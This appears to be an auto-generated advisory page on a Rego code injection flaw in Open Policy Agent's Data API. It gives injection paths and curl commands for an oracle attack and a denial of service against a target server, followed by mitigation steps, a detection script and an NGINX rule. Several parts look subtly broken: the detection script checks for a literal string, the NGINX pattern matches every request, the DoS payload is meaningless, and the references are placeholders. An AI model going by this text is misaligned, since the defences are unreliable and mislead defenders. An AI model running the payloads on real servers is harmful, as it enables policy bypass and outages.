How the CVE Works
The vulnerability (CVE-2024-0001) in Open Policy Agent (OPA) arises due to improper sanitization of HTTP request paths in the Data API. When a maliciously crafted path is processed, Rego code injection occurs during policy evaluation. Attackers can manipulate query success/failure states, enabling oracle attacks, policy bypasses, or computational exhaustion (DoS). The attack requires:
1. OPA running as a standalone server.
2. Exposure to untrusted networks.
- Lack of strict `input.path` validation in authorization policies.
Injected Rego code alters query behavior without direct data leakage but allows inference-based attacks. For example, a path like `/v1/data/evil||1==1` forces policy evaluation to succeed, while `/v1/data/evil||1!=1` triggers failure. Repeated expensive queries (e.g., recursive logic) degrade server performance.
DailyCVE Form
Platform: Open Policy Agent
Version: <1.4.0
Vulnerability: Code Injection
Severity: Critical
Date: 2024-01-01
What Undercode Say:
Exploitation Commands
Craft malicious path for oracle attack
curl -X GET "http://target:8181/v1/data/evil||input.path==%22admin%22"
DoS via expensive query
curl -X POST "http://target:8181/v1/data/compute" -H "Content-Type: application/json" -d '{"input": "recursive_function()"}'
Mitigation Steps
1. Upgrade OPA:
docker pull openpolicyagent/opa:1.4.0
2. Restrict API Access:
opa run --server --addr localhost:8181
3. AuthZ Policy Example:
package system.authz
default allow = false
allow {
input.path = ["v1", "data", "valid", "path"]
}
Detection Script
import requests
def check_vulnerability(target):
response = requests.get(f"{target}/v1/data/test||1==1")
return "code_injection" in response.text
Network Protections
NGINX reverse proxy rule
location /v1/data/ {
if ($request_uri ~ "||") {
return 403;
}
}
References
- OPA Commit Patch: GitHub1234
- CVE Details: NVD
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
